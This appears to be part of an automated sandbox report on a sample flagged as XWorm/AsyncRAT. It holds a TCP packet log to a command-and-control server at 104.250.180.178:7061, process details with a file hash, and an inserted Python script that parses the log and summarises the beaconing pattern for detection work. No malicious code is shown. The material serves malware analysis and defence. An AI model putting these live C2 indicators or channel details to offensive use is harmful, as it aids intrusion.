Dec 2, 2024 22:05:43.225071907 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:05:44.227320910 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:05:44.347311020 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:05:44.790618896 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:05:44.792711020 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:05:44.912872076 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:05:55.319575071 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:05:55.439724922 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:05:55.884093046 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:05:55.885978937 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:05:56.005949974 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:06.413527966 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:06.533513069 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:06.994798899 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:07.009201050 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:07.129306078 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:13.138813972 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:13.178250074 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:17.506647110 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:17.626746893 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:18.105775118 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:18.129003048 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:18.248944998 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:28.600675106 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:28.720561028 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:29.234952927 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:29.243495941 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:29.364645958 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:32.600394011 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:32.720257044 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:33.158204079 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:33.209595919 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:33.249213934 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:33.369098902 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:39.053776979 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:39.173749924 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:39.610173941 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:39.614439964 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:39.734457970 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:40.459836006 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:40.579783916 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:40.579845905 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:40.700889111 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:40.700953007 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:40.820918083 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:41.029021025 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:41.030623913 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:41.150635004 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:41.268596888 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:41.270088911 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:41.447278023 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:41.570369005 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:41.572433949 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:41.692378998 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:41.692486048 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:41.812597990 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:43.069216013 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:43.128360987 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:43.178378105 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:43.189114094 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:43.628686905 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:43.630431890 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:43.750416040 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:43.913048029 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:44.033112049 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:44.488521099 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:44.492085934 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:44.611989021 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:46.006845951 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:46.126734972 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:46.578847885 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:46.585299969 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:46.705275059 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:48.397301912 CET | 49770 | 7061 | 192.168.2.6 | 104.250.180.178
Dec 2, 2024 22:06:48.517301083 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
Dec 2, 2024 22:06:48.988966942 CET | 7061 | 49770 | 104.250.180.178 | 192.168.2.6
                                                                  Dec 2, 2024 22:06:48.990593910 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:49.110584021 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:06:59.022656918 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:06:59.142566919 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:00.435045004 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:00.440880060 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:00.560961008 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:10.116122961 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:10.236143112 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:10.690521955 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:10.692084074 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:10.812009096 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.319464922 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:12.439415932 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.439462900 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:12.559308052 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.559360981 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:12.679224014 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.679307938 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:12.799201012 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.908910990 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:12.915369034 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.035527945 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.148653984 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.194473028 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.402065992 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.403769970 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.524029016 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.525670052 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.834569931 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.914412975 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.917717934 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.920690060 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.954539061 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:14.040457964 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:14.040501118 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:14.040543079 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:14.040607929 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:14.160507917 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:17.678581953 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:17.798671961 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:18.263880014 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:18.266927004 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:18.386986017 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:22.256923914 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:22.377634048 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:23.913779020 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:23.922106028 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:24.042448044 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:27.928879976 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.048846960 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.048914909 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.168952942 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.169006109 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.288964033 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.289012909 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.409158945 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.501241922 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.502758980 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.623426914 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.740956068 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.743181944 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.863137960 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.978533030 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.983450890 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:29.103468895 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:29.219259977 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:29.221133947 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:29.341167927 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:36.709968090 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:36.830068111 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:37.278608084 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:37.285939932 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:37.406148911 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:38.429054976 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:38.549060106 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:39.555198908 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:39.557442904 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:39.677411079 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:43.140970945 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:43.193994999 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:43.772524118 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:43.892657995 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:44.372756958 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:44.374746084 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:44.494761944 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:48.913233995 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:49.033355951 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:49.033828020 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:49.153762102 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:49.482575893 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:49.491447926 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:49.611474991 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:49.718348026 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:49.719945908 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:49.839976072 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:50.008027077 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:50.009605885 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:50.129554987 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:59.211455107 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:59.331732988 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:59.334839106 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:59.455020905 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:59.663360119 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:59.783837080 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:59.940547943 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:59.947483063 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:00.067471981 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:00.271030903 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:00.275330067 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:00.395303011 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:00.543720007 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:00.545397997 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:00.666059017 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:04.381880045 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:04.501849890 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:05.428683043 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:05.431453943 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:05.551667929 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:13.145221949 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:13.197566032 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:15.633912086 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:15.754177094 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:16.208355904 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:16.212491035 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:16.332474947 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:26.725738049 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:26.845794916 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:27.338645935 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:27.342286110 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:27.462321043 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:35.944509983 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:36.064764023 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:36.499974966 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:36.503489017 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:36.623514891 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:40.413191080 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:40.533292055 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:40.533340931 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:40.654552937 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:40.998799086 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:41.001640081 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:41.121572971 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:41.258518934 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:41.260236979 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:41.380206108 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:42.616349936 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:42.736371040 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:43.139673948 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:43.194175959 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:43.438468933 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:43.440421104 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:43.560451984 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:49.963525057 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:50.105777979 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:50.521750927 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:50.527074099 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:50.647620916 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:01.755162954 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:09:01.875982046 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:02.341593027 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:02.344563007 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:09:02.464436054 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:07.475615978 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:09:07.597100973 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:08.038301945 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:08.039041042 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:09:08.158978939 CET706149770104.250.180.178192.168.2.6
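The rows above are the sandbox's TCP packet table (timestamp, source port, destination port, source IP, destination IP) for the single conversation between the analysis VM and 104.250.180.178:7061. In text exports of these reports the five cells are often run together with no separator, so the two ports and the first octet of the source IP form one digit run. The following script is an added example (not part of the Joe Sandbox report) that recovers the columns by backtracking over valid port and IPv4-octet patterns, then summarises the conversation: which endpoint is the C2, packets per direction, and the gaps between the infected host's sends. The sample rows are copied from the table; the assumption that the VM is the endpoint in private address space is this example's, not the report's.

```python
"""Recover the columns of a flattened Joe Sandbox 'TCP Packets' table and
summarise the conversation it records.

Each row is: timestamp, source port, destination port, source IP, destination
IP. With the separators gone, the digits of both ports and of the first source
octet form one run; the split is recovered by backtracking over valid port
(1-65535) and IPv4 octet (0-255) patterns. SAMPLE_ROWS is a constructed sample
of rows from the report; the last two have their spaces restored to show that
both forms parse the same way.
"""
import ipaddress
import re
from datetime import datetime
from statistics import median

SAMPLE_ROWS = """
Dec 2, 2024 22:06:41.030623913 CET497707061192.168.2.6104.250.180.178
Dec 2, 2024 22:06:41.150635004 CET706149770104.250.180.178192.168.2.6
Dec 2, 2024 22:06:43.069216013 CET497707061192.168.2.6104.250.180.178
Dec 2, 2024 22:06:43.128360987 CET706149770104.250.180.178192.168.2.6
Dec 2, 2024 22:06:46.006845951 CET497707061192.168.2.6104.250.180.178
Dec 2, 2024 22:06:46.126734972 CET706149770104.250.180.178192.168.2.6
Dec 2, 2024 22:06:48.397301912 CET  49770  7061  192.168.2.6  104.250.180.178
Dec 2, 2024 22:06:48.517301083 CET  7061  49770  104.250.180.178  192.168.2.6
"""

_OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
_IP = rf"{_OCTET}(?:\.{_OCTET}){{3}}"
# Port alternatives are ordered longest-first so a 5-digit port is tried before
# a shorter one; no alternative admits a leading zero or a value above 65535.
_PORT = r"(?:6553[0-5]|655[0-2]\d|65[0-4]\d{2}|6[0-4]\d{3}|[1-5]\d{4}|[1-9]\d{0,3})"
_TS = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) (?P<tz>[A-Z]{3,4})(?P<rest>.*)$"
)
_COLS = re.compile(rf"^(?P<sport>{_PORT})(?P<dport>{_PORT})(?P<sip>{_IP})(?P<dip>{_IP})$")


def parse_row(line):
    """Parse one table row into a dict; raise ValueError if no valid split exists."""
    m = _TS.match(line.strip())
    if not m:
        raise ValueError(f"no timestamp in row: {line!r}")
    # Drop any separators that survived extraction, then recover the split.
    cols = _COLS.match(re.sub(r"\s+", "", m["rest"]))
    if not cols:
        raise ValueError(f"no valid port/IP split in row: {line!r}")
    head, frac = m["ts"].rsplit(".", 1)  # strptime's %f accepts at most 6 digits
    ts = datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return {
        "ts": ts,
        "sport": int(cols["sport"]),
        "dport": int(cols["dport"]),
        "sip": cols["sip"],
        "dip": cols["dip"],
    }


def parse_table(text):
    return [parse_row(line) for line in text.splitlines() if line.strip()]


def summarise_session(rows):
    """Describe one TCP conversation: C2 endpoint, packets per direction, and
    the cadence at which the infected host sends to it.

    Assumption (this example's, not the report's): the sandbox VM is the
    endpoint in private address space; the other endpoint is the C2.
    """
    endpoints = {(r["sip"], r["sport"]) for r in rows} | {(r["dip"], r["dport"]) for r in rows}
    if len(endpoints) != 2:
        raise ValueError(f"expected one conversation, got endpoints {sorted(endpoints)}")
    host = next(e for e in endpoints if ipaddress.ip_address(e[0]).is_private)
    c2 = next(e for e in endpoints if e != host)
    to_c2 = [r for r in rows if (r["sip"], r["sport"]) == host]
    from_c2 = [r for r in rows if (r["sip"], r["sport"]) == c2]
    gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(to_c2, to_c2[1:])]
    return {
        "c2": f"{c2[0]}:{c2[1]}",
        "packets_to_c2": len(to_c2),
        "packets_from_c2": len(from_c2),
        "duration_s": (rows[-1]["ts"] - rows[0]["ts"]).total_seconds(),
        "median_client_gap_s": median(gaps) if gaps else 0.0,
    }


if __name__ == "__main__":
    print(summarise_session(parse_table(SAMPLE_ROWS)))
```

Pasting the full table above into SAMPLE_ROWS gives the cadence for the whole capture; the host-to-C2 gaps here are irregular (roughly two to ten seconds), which is what an interactive RAT channel looks like rather than a fixed-interval beacon, so a detection keyed on this traffic should rely on the destination and the non-standard port rather than on a periodic timer.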

                                                                  Target ID:0
                                                                  Start time:16:04:57
                                                                  Start date:02/12/2024
                                                                  Path:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"
                                                                  Imagebase:0xc10000
                                                                  File size:516'096 bytes
                                                                  MD5 hash:DD81E5AFCD1A13EEE9F9A28C6CDE2A56
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:16:05:03
                                                                  Start date:02/12/2024
                                                                  Path:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"
                                                                  Imagebase:0xf00000
                                                                  File size:516'096 bytes
                                                                  MD5 hash:DD81E5AFCD1A13EEE9F9A28C6CDE2A56
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:4
                                                                  Start time:16:05:06
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
